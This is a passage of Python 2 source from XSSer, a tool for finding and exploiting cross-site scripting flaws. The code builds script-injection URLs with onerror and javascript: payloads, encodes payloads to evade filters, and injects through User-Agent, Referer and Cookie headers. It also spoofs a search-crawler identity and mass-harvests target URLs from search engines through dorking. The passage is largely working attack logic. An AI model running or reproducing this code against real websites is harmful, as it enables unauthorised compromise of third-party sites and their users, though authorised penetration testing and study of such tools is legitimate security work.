  1331. c_info = str(curl_handle.info())
  1332. c_body = str(curl_handle.body())
  1333. if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection]
  1334. b64_string = payload["payload"].split("[B64]")
  1335. b64_string = b64_string[1]
  1336. b64_string = b64_string.replace('PAYLOAD', hashing)
  1337. b64_string = b64encode(b64_string)
  1338. if b64_string.startswith("="):
  1339. b64_string = b64_string.replace("=", "")
  1340. hashing = b64_string
  1341. if str(hashing) in c_body and "http-code: 200" in c_info: # only add a success if hashing is on body and we have HTTP 200-OK [XSS CHECKPOINT!]
  1342. # some anti false positives checkers
  1343. if str(options.discode) in curl_handle.body(): # provided by user
  1344. self.report("[Info] Reply contains code [ --discode ] provided to be discarded... forcing failure!\n")
  1345. self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed!
  1346. else:
  1347. if str('/&gt;' + hashing) in curl_handle.body() or str('href=' + dest_url + hashing) in curl_handle.body() or str('content=' + dest_url + hashing) in curl_handle.body():
  1348. self.report("[Info] Reply looks like a -false positive- from here. Check it, manually... forcing discard!\n")
  1349. self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed!
  1350. else:
  1351. if options.discode:
  1352. self.report("[Info] Reply does NOT contain code [ --discode ] provided to be discarded... adding! ;-)\n")
  1353. self.add_success(dest_url, payload, hashing, query_string, orig_url, method) # success!
  1354. else:
  1355. self.add_failure(dest_url, payload, hashing, query_string, orig_url, method) # failed!
  1356. def add_failure(self, dest_url, payload, hashing, query_string, orig_url, method='url'):
  1357. """
  1358. Add an attack that failed to inject
  1359. """
  1360. if method == "heuristic":
  1361. self.report(" [ NOT-FOUND ] -> [ " + str(payload) + " ] : [ " + str(hashing)+ " ]")
  1362. self.hash_notfound.append((dest_url, "[Heuristic test]", method, hashing, query_string, payload, orig_url))
  1363. elif method == "hashing check":
  1364. self.report(" [ NOT-FOUND ] -> [ " + str(hashing) + " ] : [ hashing_check ]")
  1365. self.hash_notfound.append((dest_url, "[hashing check]", method, hashing, query_string, payload, orig_url))
  1366. else:
  1367. self.report(" [ NOT-FOUND ] -> [ " + hashing + " ] : [ " + method + " ]")
  1368. self.hash_notfound.append((dest_url, payload['browser'], method, hashing, query_string, payload, orig_url))
  1369. def add_success(self, dest_url, payload, hashing, query_string, orig_url, method='url'):
  1370. """
  1371. Add an attack that managed to inject the code
  1372. """
  1373. if method == "heuristic":
  1374. self.report(" [ FOUND! ] -> [ " + str(payload) + " ] : [ " + str(hashing)+ " ]")
  1375. self.hash_found.append((dest_url, "[Heuristic test]", method, hashing, query_string, payload, orig_url))
  1376. elif method == "hashing check":
  1377. self.report(" [ FOUND! ] -> [ " + str(payload) + " ] : [ " + str(hashing)+ " ]")
  1378. self.hash_found.append((dest_url, "[hashing check]", method, hashing, query_string, payload, orig_url))
  1379. else:
  1380. payload_sub = payload['payload']
  1381. self.report(" [ FOUND! ] -> [ " + hashing + " ] : [ " + method + " ] -> [ " + payload_sub + " ]")
  1382. self.hash_found.append((dest_url, payload['browser'], method, hashing, query_string, payload, orig_url))
  1383. for reporter in self._reporters:
  1384. reporter.add_success(dest_url)
  1385. if self.options.reversecheck:
  1386. if self.options.dcp or self.options.inducedcode or self.options.dom:
  1387. pass
  1388. else:
  1389. self.do_token_check(orig_url, hashing, payload, query_string, dest_url)
  1390. def do_token_check(self, orig_url, hashing, payload, query_string, dest_url):
  1391. self.report("\n" + "="*50)
  1392. self.report("\n[Info] Trying [ --reverse-check ] from:\n\n"+ orig_url + query_string)
  1393. if "VECTOR" in orig_url:
  1394. dest_url = orig_url
  1395. else:
  1396. if not dest_url.endswith("/"):
  1397. dest_url = dest_url + "/"
  1398. dest_url = orig_url + query_string + payload['payload']
  1399. tok_url = None
  1400. self_url = "http://localhost:19084/success/" + hashing
  1401. shadow_js_inj = "document.location=document.location.hash.substring(1)"
  1402. shadow_inj = "<script>" + shadow_js_inj + "</script>"
  1403. shadow_js_inj = shadow_js_inj
  1404. dest_url = dest_url.split("#")[0]
  1405. def requote(what):
  1406. return urllib.quote_plus(what)
  1407. vector_and_payload = payload['payload']
  1408. _e = self.encoding_permutations
  1409. if 'XSS' in dest_url:
  1410. dest_url = dest_url.replace('XSS', vector_and_payload)
  1411. if 'X1S' in dest_url:
  1412. dest_url = dest_url.replace('XSS', vector_and_payload)
  1413. if 'VECTOR' in dest_url:
  1414. dest_url = dest_url.replace('VECTOR', vector_and_payload)
  1415. if '">PAYLOAD' in dest_url:
  1416. tok_url = dest_url.replace('">PAYLOAD', _e('">' + shadow_inj))
  1417. tok_url += '#' + self_url
  1418. elif "'>PAYLOAD" in dest_url:
  1419. tok_url = dest_url.replace("'>PAYLOAD", _e("'>" + shadow_inj))
  1420. tok_url += '#' + self_url
  1421. elif "javascript:PAYLOAD" in dest_url:
  1422. tok_url = dest_url.replace('javascript:PAYLOAD',
  1423. self.encoding_permutations("window.location='" + self_url+"';"))
  1424. tok_url = dest_url.replace("javascript:PAYLOAD",
  1425. _e("javascript:" + shadow_js_inj))
  1426. tok_url+= '#' + self_url
  1427. elif '"PAYLOAD"' in dest_url:
  1428. tok_url = dest_url.replace('"PAYLOAD"', '"' + self_url + '"')
  1429. elif "'PAYLOAD'" in dest_url:
  1430. tok_url = dest_url.replace("'PAYLOAD'", "'" + self_url + "'")
  1431. elif 'PAYLOAD' in dest_url and 'SRC' in dest_url:
  1432. tok_url = dest_url.replace('PAYLOAD', self_url)
  1433. elif "SCRIPT" in dest_url:
  1434. tok_url = dest_url.replace('PAYLOAD',
  1435. shadow_js_inj)
  1436. tok_url += '#' + self_url
  1437. elif 'onerror="PAYLOAD"' in dest_url:
  1438. tok_url = dest_url.replace('onerror="PAYLOAD"', _e('onerror="' + shadow_inj + '"'))
  1439. tok_url+= '#' + self_url
  1440. elif 'onerror="javascript:PAYLOAD"' in dest_url:
  1441. tok_url = dest_url.replace('javascript:PAYLOAD',
  1442. self.encoding_permutations("window.location='" + self_url+"';"))
  1443. tok_url = dest_url.replace('onerror="javascript:PAYLOAD"',
  1444. _e('onerror="javascript:' + shadow_js_inj + '"'))
  1445. tok_url+= '#' + self_url
  1446. elif '<PAYLOAD>' in dest_url:
  1447. tok_url = dest_url.replace("<PAYLOAD>", _e(shadow_inj))
  1448. tok_url+= '#' + self_url
  1449. elif 'PAYLOAD' in dest_url:
  1450. tok_url = dest_url.replace("PAYLOAD", _e(shadow_inj))
  1451. tok_url+= '#' + self_url
  1452. elif 'href' in dest_url and 'PAYLOAD' in dest_url:
  1453. tok_url = dest_url.replace('PAYLOAD', self_url)
  1454. elif 'HREF' in dest_url and 'PAYLOAD' in dest_url:
  1455. tok_url = dest_url.replace('PAYLOAD', self_url)
  1456. elif 'url' in dest_url and 'PAYLOAD' in dest_url:
  1457. tok_url = dest_url.replace('PAYLOAD', self_url)
  1458. self.final_attacks[hashing] = {'url': tok_url}
  1459. if tok_url:
  1460. try:
  1461. if self.options.reverseopen:
  1462. self.report("\n" + "-"*25+"\n")
  1463. self.report("[Info] Launching web browser (default) with a 'token' url...")
  1464. self._webbrowser.open(tok_url)
  1465. except:
  1466. pass
  1467. def _report_attack_failure(self, curl_handle, dest_url, payload,\
  1468. query_string, orig_url):
  1469. """
  1470. report connection failure of an attack
  1471. """
  1472. options = self.options
  1473. current_hashes = [] # to check for ongoing hashes
  1474. if payload['browser'] == "[Heuristic test]":
  1475. for key, value in self.hashed_injections.iteritems():
  1476. if key not in current_hashes:
  1477. self.final_hashes[key] = value
  1478. current_hashes.append(key)
  1479. elif self.options.hash:
  1480. for key, value in self.hashed_injections.iteritems():
  1481. self.final_hashes[key] = value
  1482. current_hashes.append(key)
  1483. else:
  1484. self.report("-"*45)
  1485. self.report("\n[!] Hashing: \n")
  1486. for key, value in self.hashed_injections.iteritems():
  1487. if str(key) in str(dest_url): # GET
  1488. if key not in current_hashes:
  1489. self.report(" [ " +key+" ] : [" , value + " ]")
  1490. self.final_hashes[key] = value
  1491. current_hashes.append(key)
  1492. else:
  1493. if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection]
  1494. b64_string = payload["payload"].split("[B64]")
  1495. b64_string = b64_string[1]
  1496. b64_string = b64_string.replace('PAYLOAD', key)
  1497. b64_string = b64encode(b64_string)
  1498. b64_string = urllib.urlencode({'':b64_string})
  1499. if b64_string.startswith("="):
  1500. b64_string = b64_string.replace("=", "")
  1501. if str(b64_string) in str(dest_url):
  1502. if key not in current_hashes:
  1503. self.report(" [ " +key+" ] : [" , value + " ]")
  1504. self.final_hashes[key] = value
  1505. current_hashes.append(key)
  1506. else: # when using encoders (Str, Hex, Dec...)
  1507. payload_string = payload["payload"].replace("PAYLOAD", key)
  1508. hashed_payload = self.encoding_permutations(payload_string)
  1509. if self.options.Cem:
  1510. enc_perm = options.Cem.split(",")
  1511. for e in enc_perm:
  1512. hashed_payload = self.encoding_permutations(payload_string)
  1513. if e == "Str":
  1514. hashed_payload = hashed_payload.replace(",", "%2C")
  1515. if e == "Mix":
  1516. hashed_payload=urllib.quote(hashed_payload)
  1517. if e == "Dec":
  1518. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1519. if e == "Hex":
  1520. hashed_payload = hashed_payload.replace("%", "%25")
  1521. if e == "Hes":
  1522. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1523. hashed_payload = hashed_payload.replace(";", "%3B")
  1524. else:
  1525. if self.options.Str:
  1526. hashed_payload = hashed_payload.replace(",", "%2C")
  1527. if self.options.Mix:
  1528. hashed_payload=urllib.quote(hashed_payload)
  1529. if self.options.Dec:
  1530. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1531. if self.options.Hex:
  1532. hashed_payload = hashed_payload.replace("%", "%25")
  1533. if self.options.Hes:
  1534. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1535. hashed_payload = hashed_payload.replace(";", "%3B")
  1536. if str(hashed_payload) in str(dest_url):
  1537. if key not in current_hashes:
  1538. self.report(" [ " +key+" ] : [" , value + " ]")
  1539. self.final_hashes[key] = value
  1540. current_hashes.append(key)
  1541. if self.extra_hashed_injections:
  1542. for k, v in self.extra_hashed_injections.iteritems():
  1543. payload_url = str(v[1])
  1544. if payload_url == payload["payload"]:
  1545. if k not in current_hashes:
  1546. self.report(" [ " +k+" ] : [" , v[0] + " ]")
  1547. self.final_hashes[k] = v[0]
  1548. current_hashes.append(k)
  1549. self.report("\n"+"-"*45+"\n")
  1550. if payload['browser'] == "[Heuristic test]":
  1551. self.report("[+] Checking: " + str(payload['payload']).strip('XSS'), "\n")
  1552. else:
  1553. if self.extra_hashed_injections:
  1554. extra_attacks=[]
  1555. if options.xsa:
  1556. extra_attacks.append("XSA")
  1557. if options.xsr:
  1558. extra_attacks.append("XSR")
  1559. if options.coo:
  1560. extra_attacks.append("COO")
  1561. if extra_attacks:
  1562. extra_attacks = "+ "+ str(extra_attacks)
  1563. if options.postdata:
  1564. self.report("[*] Trying: " + extra_attacks + "\n\n" + orig_url.strip(), "(POST:", query_string + ") \n")
  1565. else:
  1566. self.report("[*] Trying: " + extra_attacks + "\n\n" + dest_url.strip()+"\n")
  1567. else:
  1568. if options.postdata:
  1569. self.report("[*] Trying: \n\n" + orig_url.strip(), "(POST:", query_string + ")\n")
  1570. else:
  1571. self.report("[*] Trying: \n\n" + dest_url.strip()+"\n")
  1572. if not self.options.hash and not self.options.script:
  1573. if not "XSS" in dest_url or not "X1S" in dest_url and self.options.xsa or self.options.xsr or self.options.coo:
  1574. pass
  1575. else:
  1576. self.report("-"*45)
  1577. if payload['browser'] == "[Heuristic test]" or payload['browser'] == "[hashed_precheck_system]" or payload['browser'] == "[manual_injection]":
  1578. pass
  1579. else:
  1580. if not "XSS" in dest_url or not "X1S" in dest_url:
  1581. if self.options.xsa or self.options.xsr or self.options.coo:
  1582. pass
  1583. else:
  1584. self.report("-"*45)
  1585. self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n")
  1586. if not self.options.verbose:
  1587. self.report("-"*45 + "\n")
  1588. else:
  1589. self.report("-"*45)
  1590. self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n")
  1591. if not self.options.verbose:
  1592. self.report("-"*45 + "\n")
  1593. # statistics injections counters
  1594. if payload['browser']=="[hashed_precheck_system]" or payload['browser']=="[Heuristic test]":
  1595. self.check_positives = self.check_positives + 1
  1596. elif payload['browser']=="[Data Control Protocol Injection]":
  1597. self.dcp_injection = self.dcp_injection + 1
  1598. elif payload['browser']=="[Document Object Model Injection]":
  1599. self.dom_injection = self.dom_injection + 1
  1600. elif payload['browser']=="[Induced Injection]":
  1601. self.httpsr_injection = self.httpsr_injection + 1
  1602. elif payload['browser']=="[manual_injection]":
  1603. self.manual_injection = self.manual_injection + 1
  1604. else:
  1605. self.auto_injection = self.auto_injection +1
  1606. if not self.hashed_injections:
  1607. for k, v in self.extra_hashed_injections.iteritems():
  1608. if k in current_hashes:
  1609. if v[0] == "XSA":
  1610. agent = v[1]
  1611. agent = agent.replace("PAYLOAD", k)
  1612. Curl.agent = agent
  1613. if v[0] == "XSR":
  1614. referer = v[1]
  1615. referer = referer.replace("PAYLOAD", k)
  1616. Curl.referer = referer
  1617. if v[0] == "COO":
  1618. cookie = v[1]
  1619. cookie = cookie.replace("PAYLOAD", k)
  1620. Curl.cookie = cookie
  1621. else:
  1622. for key, value in self.hashed_injections.iteritems():
  1623. for k, v in self.extra_hashed_injections.iteritems():
  1624. payload_url = v[1]
  1625. payload_url = payload_url.replace("PAYLOAD",key)
  1626. payload_url = payload_url.replace(" ", "+") # black magic!
  1627. final_dest_url = str(urllib.unquote(dest_url.strip()))
  1628. if payload_url in final_dest_url:
  1629. if v[0] == "XSA":
  1630. agent = v[1]
  1631. agent = agent.replace("PAYLOAD", k)
  1632. Curl.agent = agent
  1633. if v[0] == "XSR":
  1634. referer = v[1]
  1635. referer = referer.replace("PAYLOAD", k)
  1636. Curl.referer = referer
  1637. if v[0] == "COO":
  1638. cookie = v[1]
  1639. cookie = cookie.replace("PAYLOAD", k)
  1640. Curl.cookie = cookie
  1641. else:
  1642. if k in current_hashes:
  1643. if v[0] == "XSA":
  1644. agent = v[1]
  1645. agent = agent.replace("PAYLOAD", k)
  1646. Curl.agent = agent
  1647. if v[0] == "XSR":
  1648. referer = v[1]
  1649. referer = referer.replace("PAYLOAD", k)
  1650. Curl.referer = referer
  1651. if v[0] == "COO":
  1652. cookie = v[1]
  1653. cookie = cookie.replace("PAYLOAD", k)
  1654. Curl.cookie = cookie
  1655. if options.verbose:
  1656. self.report("-"*45)
  1657. self.report("\n[+] HTTP Headers Verbose:\n")
  1658. self.report(" [Client Request]")
  1659. Curl.print_options()
  1660. self.report(" [Server Reply]\n")
  1661. self.report(curl_handle.info())
  1662. self.report("="*45)
  1663. self.report("[*] Injection(s) Results:")
  1664. self.report("="*45 + "\n")
  1665. if payload['browser']=="[Heuristic test]":
  1666. for key, value in self.final_hashes.iteritems():
  1667. if str(key) in dest_url:
  1668. heuristic_string = key
  1669. heuristic_param = str(payload['payload']).strip('XSS')
  1670. if heuristic_param == "\\":
  1671. self.heuris_backslash_notfound = self.heuris_backslash_notfound + 1
  1672. elif heuristic_param == "/":
  1673. self.heuris_slash_notfound = self.heuris_slash_notfound + 1
  1674. elif heuristic_param == ">":
  1675. self.heuris_mayor_notfound = self.heuris_mayor_notfound + 1
  1676. elif heuristic_param == "<":
  1677. self.heuris_minor_notfound = self.heuris_minor_notfound + 1
  1678. elif heuristic_param == ";":
  1679. self.heuris_semicolon_notfound = self.heuris_semicolon_notfound + 1
  1680. elif heuristic_param == "'":
  1681. self.heuris_colon_notfound = self.heuris_colon_notfound + 1
  1682. elif heuristic_param == '"':
  1683. self.heuris_doublecolon_notfound = self.heuris_doublecolon_notfound + 1
  1684. elif heuristic_param == "=":
  1685. self.heuris_equal_notfound = self.heuris_equal_notfound + 1
  1686. self.add_failure(dest_url, heuristic_param, value, query_string, orig_url, 'heuristic') # heuristic fail
  1687. elif self.options.hash:
  1688. for key, value in self.final_hashes.iteritems():
  1689. self.add_failure(dest_url, key, value, query_string, orig_url, 'hashing check') # hashing_check fail
  1690. self.report("\n" +"="*45)
  1691. else:
  1692. for key, value in self.final_hashes.iteritems():
  1693. if "XSA" in value:
  1694. method = "xsa"
  1695. hashing = key
  1696. elif "XSR" in value:
  1697. method = "xsr"
  1698. hashing = key
  1699. elif "COO" in value:
  1700. method = "coo"
  1701. hashing = key
  1702. else:
  1703. method = "url"
  1704. hashing = key
  1705. if self.options.Str:
  1706. payload_string = payload["payload"].replace("PAYLOAD", key)
  1707. hashed_payload = self.encoding_permutations(payload_string)
  1708. hashed_payload = hashed_payload.replace(",", "%2C")
  1709. if str(hashed_payload) in str(dest_url):
  1710. self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
  1711. elif self.options.Mix:
  1712. payload_string = payload["payload"].replace("PAYLOAD", key)
  1713. hashed_payload = self.encoding_permutations(payload_string)
  1714. hashed_payload=urllib.quote(hashed_payload)
  1715. if str(hashed_payload) in str(dest_url):
  1716. self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
  1717. elif self.options.Dec:
  1718. payload_string = payload["payload"].replace("PAYLOAD", key)
  1719. hashed_payload = self.encoding_permutations(payload_string)
  1720. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1721. if str(hashed_payload) in str(dest_url):
  1722. self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
  1723. elif self.options.Hex:
  1724. payload_string = payload["payload"].replace("PAYLOAD", key)
  1725. hashed_payload = self.encoding_permutations(payload_string)
  1726. hashed_payload = hashed_payload.replace("%", "%25")
  1727. if str(hashed_payload) in str(dest_url):
  1728. self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
  1729. elif self.options.Hes:
  1730. payload_string = payload["payload"].replace("PAYLOAD", key)
  1731. hashed_payload = self.encoding_permutations(payload_string)
  1732. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1733. hashed_payload = hashed_payload.replace(";", "%3B")
  1734. if str(hashed_payload) in str(dest_url):
  1735. self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
  1736. else:
  1737. if self.options.Cem:
  1738. enc_perm = options.Cem.split(",")
  1739. payload_string = payload["payload"].replace("PAYLOAD", key)
  1740. for e in enc_perm:
  1741. hashed_payload = self.encoding_permutations(payload_string)
  1742. if str(e) == "Str":
  1743. hashed_payload = hashed_payload.replace(",", "%2C")
  1744. if e == "Mix":
  1745. hashed_payload=urllib.quote(hashed_payload)
  1746. if e == "Dec":
  1747. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1748. if e == "Hex":
  1749. hashed_payload = hashed_payload.replace("%", "%25")
  1750. if e == "Hes":
  1751. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1752. hashed_payload = hashed_payload.replace(";", "%3B")
  1753. if str(hashed_payload) in str(dest_url):
  1754. self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
  1755. else:
  1756. if str(key) in str(dest_url):
  1757. self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
  1758. else:
  1759. if key in current_hashes:
  1760. if method == "xsa":
  1761. self.add_failure(dest_url, payload, key, query_string, orig_url, "XSA") # failed!
  1762. elif method == "xsr":
  1763. self.add_failure(dest_url, payload, key, query_string, orig_url, "XSR") # failed!
  1764. elif method == "coo":
  1765. self.add_failure(dest_url, payload, key, query_string, orig_url, "COO") # failed!
  1766. self.report("\n" +"="*45)
  1767. if str(curl_handle.info()["http-code"]) == "404":
  1768. self.report("\n[Error] 404 Not Found: The server has not found anything matching the Request-URI\n")
  1769. elif str(curl_handle.info()["http-code"]) == "403":
  1770. self.report("\n[Error] 403 Forbidden: The server understood the request, but is refusing to fulfill it\n")
  1771. elif str(curl_handle.info()["http-code"]) == "400":
  1772. self.report("\n[Error] 400 Bad Request: The request could not be understood by the server due to malformed syntax\n")
  1773. elif str(curl_handle.info()["http-code"]) == "401":
  1774. self.report("\n[Error] 401 Unauthorized: The request requires user authentication\n\nIf you are trying to authenticate: Login is failing!\n\ncheck:\n- authentication type is correct for the type of realm (basic, digest, gss, ntlm...)\n- credentials 'user:password' are typed correctly\n")
  1775. elif str(curl_handle.info()["http-code"]) == "407":
  1776. self.report("\n[Error] 407 Proxy Authentication Required: XSSer must first authenticate itself with the proxy\n")
  1777. elif str(curl_handle.info()["http-code"]) == "408":
  1778. self.report("\n[Error] 408 Request Timeout: XSSer did not produce a request within the time that the server was prepared to wait\n")
  1779. elif str(curl_handle.info()["http-code"]) == "500":
  1780. self.report("\n[Error] 500 Internal Server Error: The server encountered an unexpected condition which prevented it from fulfilling the request\n")
  1781. elif str(curl_handle.info()["http-code"]) == "501":
  1782. self.report("\n[Error] 501 Not Implemented: The server does not support the functionality required to fulfill the request\n")
  1783. elif str(curl_handle.info()["http-code"]) == "502":
  1784. self.report("\n[Error] 502 Bad Gateway: The server received an invalid response from the upstream server\n")
  1785. elif str(curl_handle.info()["http-code"]) == "503":
  1786. self.report("\n[Error] 503 Service Unavailable: The server is currently unable to handle the request [OFFLINE!]\n")
  1787. elif str(curl_handle.info()["http-code"]) == "504":
  1788. self.report("\n[Error] 504 Gateway Timeout: The server did not receive a timely response specified by the URI (try: --ignore-proxy)\n")
  1789. elif str(curl_handle.info()["http-code"]) == "0":
  1790. self.report("\n[Error] XSSer (or your TARGET) is not working properly...\n\n - Firewall\n - Proxy\n - Target offline\n - [?] ...\n")
  1791. else:
  1792. self.report("\n[Error] Not injected!. Server responses with http-code different to: 200 OK (" + str(curl_handle.info()["http-code"]) + ")\n")
  1793. if str(curl_handle.info()["http-code"]) == "404":
  1794. self.not_connection = self.not_connection + 1
  1795. elif str(curl_handle.info()["http-code"]) == "503":
  1796. self.forwarded_connection = self.forwarded_connection + 1
  1797. else:
  1798. self.other_connection = self.other_connection + 1
  1799. def check_positive(self, curl_handle, dest_url, payload, query_string):
  1800. """
  1801. Perform extra check for positives
  1802. """
  1803. body = curl_handle.body()
  1804. pass
  1805. def create_options(self, args=None):
  1806. """
  1807. Create options for OptionParser.
  1808. """
  1809. self.optionParser = XSSerOptions()
  1810. self.options = self.optionParser.get_options(args)
  1811. if not self.options:
  1812. return False
  1813. return self.options
  1814. def _get_attack_urls(self):
  1815. """
  1816. Process payload options and make up the payload list for the attack.
  1817. """
  1818. urls = []
  1819. options = self.options
  1820. p = self.optionParser
  1821. if options.imx:
  1822. self.create_fake_image(options.imx, options.script)
  1823. return []
  1824. if options.flash:
  1825. self.create_fake_flash(options.flash, options.script)
  1826. return []
  1827. if options.update:
  1828. self.report('='*75)
  1829. self.report(str(p.version))
  1830. self.report('='*75)
  1831. try:
  1832. print("\nTrying to update to the latest stable version...\n")
  1833. Updater()
  1834. except:
  1835. print("\nSomething was wrong!. You should clone XSSer manually with:\n")
  1836. print("$ git clone https://code.03c8.net/epsylon/xsser\n")
  1837. print "\nAlso you can try this other mirror:\n"
  1838. print "$ git clone https://github.com/epsylon/xsser\n"
  1839. return []
  1840. if options.wizard: # processing wizard template
  1841. if self.user_template is not None:
  1842. self.options.statistics = True # detailed output
  1843. if self.user_template[0] == "DORKING": # mass-dorking
  1844. self.options.dork_file = True
  1845. self.options.dork_mass = True
  1846. elif "http" in self.user_template[0]: # from target url
  1847. self.options.url = self.user_template[0]
  1848. else: # from file
  1849. self.options.readfile = self.user_template[0]
  1850. if self.user_template[1] == "CRAWLER": # crawlering target
  1851. self.options.crawling = "10"
  1852. else: # manual payload (GET or POST)
  1853. if self.user_template_conntype == "GET":
  1854. self.options.getdata = self.user_template[1]
  1855. else:
  1856. self.options.postdata = self.user_template[1]
  1857. if self.user_template[2] == "Proxy: No - Spoofing: Yes":
  1858. self.options.ignoreproxy = True
  1859. self.options.agent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search" # spoof agent
  1860. self.options.referer = "127.0.0.1" # spoof referer
  1861. elif self.user_template[2] == "Proxy: No - Spoofing: No":
  1862. self.options.ignoreproxy = True
  1863. else: # using proxy + spoofing
  1864. self.options.agent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search" # spoof agent
  1865. self.options.referer = "127.0.0.1" # spoof referer
  1866. if self.user_template[2] is not None:
  1867. self.options.proxy = self.user_template[2]
  1868. else:
  1869. self.options.ignoreproxy = True
  1870. if self.user_template[3] == "Not using encoders":
  1871. pass
  1872. elif self.user_template[3] == "Hex": # Hexadecimal
  1873. self.options.Hex = True
  1874. elif self.user_template[3] == "Str+Une": # StringFromCharCode()+Unescape()
  1875. self.options.Str = True
  1876. self.options.Une = True
  1877. else: # Character encoding mutations
  1878. self.options.Cem = self.user_template[3]
  1879. if self.user_template[4] == "Alertbox": # Classic AlertBox injection
  1880. self.options.finalpayload = "<script>alert('XSS');</script>"
  1881. else:
  1882. if self.user_template[4] is not None: # Inject user script
  1883. self.options.finalpayload = self.user_template[4]
  1884. else: # not final injection
  1885. pass
  1886. else: # exit
  1887. return
  1888. if options.target: # miau!
  1889. self.report('='*75)
  1890. self.report(str(p.version))
  1891. self.report('='*75)
  1892. self.report("Testing [Full XSS audit]... ;-)")
  1893. self.report('='*75)
  1894. self.report("\n[Info] The following actions will be performed at the end:\n")
  1895. self.report(" 1- Output with detailed statistics\n")
  1896. self.report(" 2- Export results to files: \n\n - a) XSSreport.raw \n - b) XSSer_<target>_<datetime>.xml\n")
  1897. self.options.crawling = "99999" # set max num of urls to crawl
  1898. self.options.crawler_width = "5" # set max num of deeping levels
  1899. self.options.statistics = True # detailed output
  1900. self.options.timeout = "60" # timeout
  1901. self.options.retries = "2" # retries
  1902. self.options.delay = "5" # delay
  1903. self.options.threads = "10" # threads
  1904. self.options.followred = True # follow redirs
  1905. self.options.nohead = False # HEAD check
  1906. self.options.reversecheck = True # try to establish a reverse connection
  1907. self.options.fuzz = True # autofuzzing
  1908. self.options.coo = True # COO
  1909. self.options.xsa = True # XSA
  1910. self.options.xsr = True # XSR
  1911. self.options.dcp = True # DCP
  1912. self.options.dom = True # DOM
  1913. self.options.inducedcode = True # Induced
  1914. self.options.fileoutput = True # Important: export results to file (.raw)
  1915. self.options.filexml = "XSSer_" + str(self.options.target) + "_" + str(datetime.datetime.now())+".xml" # export xml
  1916. self.check_trace() # XST
  1917. urls = [options.target]
  1918. if options.url:
  1919. self.report('='*75)
  1920. self.report(str(p.version))
  1921. self.report('='*75)
  1922. if self.options.crawling:
  1923. self.report("Testing [XSS from CRAWLER]...")
  1924. else:
  1925. self.report("Testing [XSS from URL]...")
  1926. self.report('='*75)
  1927. urls = [options.url]
  1928. elif options.readfile:
  1929. self.report('='*75)
  1930. self.report(str(p.version))
  1931. self.report('='*75)
  1932. self.report("Testing [XSS from FILE]...")
  1933. self.report('='*75)
  1934. try:
  1935. f = open(options.readfile)
  1936. urls = f.readlines()
  1937. urls = [ line.replace('\n','') for line in urls ]
  1938. f.close()
  1939. except:
  1940. import os.path
  1941. if os.path.exists(options.readfile) == True:
  1942. self.report('\nThere are some errors opening the file: ', options.readfile, "\n")
  1943. else:
  1944. self.report('\nCannot found file: ', options.readfile, "\n")
  1945. elif options.dork: # dork a query
  1946. self.report('='*75)
  1947. self.report(str(p.version))
  1948. self.report('='*75)
  1949. self.report("Testing [XSS from DORK]... Good luck! ;-)")
  1950. self.report('='*75)
  1951. if options.dork_mass: # massive dorkering
  1952. for e in self.search_engines:
  1953. try:
  1954. dorker = Dorker(e)
  1955. urls = dorker.dork(options.dork)
  1956. i = 0
  1957. for u in urls: # replace original parameter for injection keyword (XSS)
  1958. p_uri = urlparse(u)
  1959. uri = p_uri.netloc
  1960. path = p_uri.path
  1961. target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
  1962. for key, value in target_params.iteritems(): # parse params to apply keywords
  1963. for v in value:
  1964. target_params[key] = 'XSS'
  1965. target_url_params = urllib.urlencode(target_params)
  1966. u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
  1967. urls[i] = u
  1968. i = i + 1
  1969. except Exception, e:
  1970. for reporter in self._reporters:
  1971. reporter.mosquito_crashed(dorker.search_url, str(e.message))
  1972. else:
  1973. if urls is not None:
  1974. for url in urls:
  1975. for reporter in self._reporters:
  1976. reporter.add_link(dorker.search_url, url)
  1977. else:
  1978. if not options.dork_engine:
  1979. options.dork_engine = 'duck' # default search engine [26-08/2019]
  1980. dorker = Dorker(options.dork_engine)
  1981. try:
  1982. urls = dorker.dork(options.dork)
  1983. i = 0
  1984. for u in urls: # replace original parameter for injection keyword (XSS)
  1985. p_uri = urlparse(u)
  1986. uri = p_uri.netloc
  1987. path = p_uri.path
  1988. target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
  1989. for key, value in target_params.iteritems(): # parse params to apply keywords
  1990. for v in value:
  1991. target_params[key] = 'XSS'
  1992. target_url_params = urllib.urlencode(target_params)
  1993. u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
  1994. urls[i] = u
  1995. i = i + 1
  1996. except Exception, e:
  1997. for reporter in self._reporters:
  1998. reporter.mosquito_crashed(dorker.search_url, str(e.message))
  1999. else:
  2000. if urls is not None:
  2001. for url in urls:
  2002. for reporter in self._reporters:
  2003. reporter.add_link(dorker.search_url, url)
  2004. elif options.dork_file: # dork from file ('core/fuzzing/dorks.txt')
  2005. self.report('='*75)
  2006. self.report(str(p.version))
  2007. self.report('='*75)
  2008. self.report("Testing [XSS from DORK]... Good luck! ;-)")
  2009. self.report('='*75)
  2010. try:
  2011. f = open('core/fuzzing/dorks.txt')
  2012. dorks = f.readlines()
  2013. dorks = [ dork.replace('\n','') for dork in dorks ]
  2014. f.close()
  2015. if not dorks:
  2016. print "\n[Error] - Imposible to retrieve 'dorks' from file.\n"
  2017. return
